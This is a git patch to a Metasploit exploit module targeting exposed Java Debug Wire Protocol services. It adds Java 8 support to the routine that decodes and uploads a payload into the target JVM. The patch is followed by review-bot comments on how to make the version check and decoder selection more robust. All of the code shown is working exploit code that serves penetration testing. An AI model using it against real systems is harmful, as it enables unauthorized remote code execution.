From 73536f2ac0112ec49bdcd54e1df87450e0adb3e5 Mon Sep 17 00:00:00 2001
From: Julian Vilas
Date: Sat, 7 Jun 2014 22:43:14 +0200
Subject: [PATCH] Add support Java 8
---
 .../exploits/multi/misc/java_jdwp_debugger.rb | 20 ++++++++++++++++---
 1 file changed, 17 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
index 73e838bfc0..85717b6a6c 100644
--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -318,6 +318,10 @@ class Metasploit3 < Msf::Exploit::Remote
 "#{@vars["vm_name"]} - #{@vars["vm_version"]}"
 end
 
+ def is_java_eight
+ version.downcase =~ /1[.]8[.]/
+ end
+
 # Returns reference types for all classes currently loaded by the target VM
 def get_all_classes
 return unless @classes.empty?
@@ -624,8 +628,13 @@ class Metasploit3 < Msf::Exploit::Remote
 # Stores the payload on a new string created in target VM
 def upload_payload(thread_id, pl_exe)
 size = @vars["objectid_size"]
- runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "")
- buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+ if is_java_eight
+ runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder")
+ buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+ else
+ runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "")
+ buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+ end
 unless buf[0] == [TAG_OBJECT].pack('C')
 fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
 end
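Review bot: `is_java_eight` (hunk at -318) runs an unanchored pattern against `version`, which judging by the context line above it is the combined `vm_name - vm_version` string, so a `1.8.` substring anywhere in either field satisfies the check. Matching the version field alone and anchoring it, e.g. `@vars["vm_version"].to_s =~ /\A1\.8\./`, would tie the branch to what the VM reports as its version; whether `vm_version` holds the bare version number should be confirmed against the code that fills `@vars`, which is outside this hunk. The `downcase` has no effect on a digits-and-dots pattern, and a Ruby predicate is normally named `java_eight?` and given a one-line comment like the one on `get_all_classes` below it.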
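Review bot: The version check and the decoder pairing are now split across two places: the hunk at -624 picks `java.util.Base64.getDecoder` or the `sun.misc.BASE64Decoder` constructor, and the hunk at -644 separately picks `decode` or `decodeBuffer`, so each site re-runs the regex and the two branches have to be kept in step by hand. Selecting the class, factory and decode method once for the detected version, with a comment on why Java 8 needs the `java.util.Base64` path, would make that pairing explicit; the commit message gives no reason. The result of `get_class_and_method` is also indexed with `["reftype_id"]` directly in both branches; if that helper can return nil when the class is not found (its body is not visible here), a `fail_with` naming the missing class would be clearer than a NoMethodError. `upload_payload` continues past the end of this hunk.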
@@ -644,7 +653,12 @@ class Metasploit3 < Msf::Exploit::Remote
 data = [TAG_OBJECT].pack('C')
 data << format(size, cmd_obj_id)
 data_array = [data]
- runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
+
+ if is_java_eight
+ runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B")
+ else
+ runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
+ end
 buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
 unless buf[0] == [TAG_ARRAY].pack('C')
 fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")